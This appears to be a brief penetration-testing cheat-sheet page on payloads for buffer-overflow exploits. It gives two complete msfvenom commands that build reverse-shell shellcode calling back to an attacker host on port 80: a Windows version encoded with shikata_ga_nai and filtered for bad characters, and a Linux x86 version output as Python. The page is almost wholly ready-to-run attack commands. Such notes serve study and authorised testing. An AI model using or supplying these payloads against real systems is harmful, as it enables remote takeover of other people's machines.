Payload for BOF
The payload to be included in the exploit can be generated using msfvenom with the parameters mentioned in the following sample code,
Windows
msfvenom -p windows/shell_reverse_tcp LHOST=192.168.1.1 LPORT=80 -f c –e x86/shikata_ga_nai -b "\x00\x0a\x0d\x25\x26\x2b\x3d"
Linux
msfvenom -p linux/x86/shell_reverse_tcp LHOST=192.168.1.1 LPORT=80 -b "\x00\x20" -f py -v shellcode
Last updated
Was this helpful?